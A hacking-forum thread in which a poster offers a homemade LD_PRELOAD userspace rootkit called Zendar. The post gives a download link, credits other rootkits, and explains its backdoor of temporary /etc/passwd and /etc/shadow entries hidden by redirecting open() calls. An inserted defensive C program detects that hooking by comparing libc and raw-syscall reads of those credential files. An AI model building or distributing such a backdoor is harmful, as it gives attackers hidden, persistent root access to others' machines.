RE: Zendar userspace rootkit 03-15-2015, 02:09 AM
#2
(03-14-2015, 09:32 PM)ring-1 Wrote: "Not another shitty ld_preload rootkit..."
Yes, it really is.
I argued with myself if I should have posted this here or in the programming section. Please move this thread if my choice is incorrect.
I've tried creating kernel level kits, believe me, but my hacker card doesn't allow me to do that.
I've not contributed anything to the forum yet, so I figured I may as well upload this as it is the only somewhat significant thing I've worked on in the past 4 months. I made this in about 10 hours - of non-stop work - when I was bored out of my skull. It works, but it's not that elaborate; you could more than likely create something more efficient in the same amount of time. It was an abstract project that I created for no reason.
You need to read the README, it's important, seriously.
Config settings are available in both zendar.c and the installation script itself.
The backdoor method works by creating a temporary entry in both /etc/passwd and /etc/shadow, and redirecting any open() calls - excluding login processes - to other files, /etc/.passwd and /etc/.shadow. The method is loud and insecure. Seriously, moral of the story: if you want a rootkit that is efficient and is guaranteed to hide effectively, then just buy one. On the other hand, if you want to create your own, then feel absolutely free to fuck around with mine.
If you want to ask questions, and I'm not studying for exams or doing anything gay, then message me. I'll more than likely reply.
Download it here: http://a.pomf.se/nicjgg.tar
Credits to the author of Azazel and Jynx2.
https://github.com/chokepoint/azazel
https://github.com/chokepoint/Jynx2
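A defender's consistency check for the open() redirection described in this post, added here as an example (it is not Zendar's code and not from the thread): it reads /etc/passwd and /etc/shadow once through libc and once through the raw kernel syscalls and reports any mismatch, since an LD_PRELOAD hook can only intercept the libc path. It assumes Linux with glibc; the function names and the 1 MiB limit are my own choices.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

#define MAX_BYTES (1 << 20)   /* compare at most 1 MiB of each file */

/* Read through libc's open()/read(), the symbols an LD_PRELOAD hook replaces. */
static long read_via_libc(const char *path, unsigned char *buf) {
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    long total = 0, n;
    while (total < MAX_BYTES && (n = read(fd, buf + total, MAX_BYTES - total)) > 0) total += n;
    close(fd);
    return n < 0 ? -1 : total;
}

/* Same read through the raw openat/read syscalls, which bypass libc entirely. */
static long read_via_syscall(const char *path, unsigned char *buf) {
    long fd = syscall(SYS_openat, AT_FDCWD, path, O_RDONLY);
    if (fd < 0) return -1;
    long total = 0, n;
    while (total < MAX_BYTES && (n = syscall(SYS_read, fd, buf + total, MAX_BYTES - total)) > 0) total += n;
    syscall(SYS_close, fd);
    return n < 0 ? -1 : total;
}

/* 1 = libc and kernel disagree (open() redirection suspected), 0 = consistent, -1 = unreadable. */
int open_hook_suspected(const char *path) {
    unsigned char *a = malloc(MAX_BYTES), *b = malloc(MAX_BYTES);
    if (!a || !b) { free(a); free(b); return -1; }
    long la = read_via_libc(path, a), lb = read_via_syscall(path, b);
    int result = (la < 0 || lb < 0) ? -1 : (la != lb || memcmp(a, b, (size_t)la) != 0);
    free(a); free(b);
    return result;
}

int main(void) {
    const char *targets[] = { "/etc/passwd", "/etc/shadow" };   /* the files the post says get redirected */
    for (size_t i = 0; i < 2; i++) {
        int r = open_hook_suspected(targets[i]);
        printf("%s: %s\n", targets[i],
               r == 1 ? "MISMATCH - possible open() hook" : r == 0 ? "consistent" : "unreadable");
    }
    return 0;
}
```

Run it as root so /etc/shadow is readable; a kernel-level hook would fool both reads, so this only covers the userspace technique the post describes.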
Would you mind putting it on github for those of us that don't want to actually download it so we can just view the code?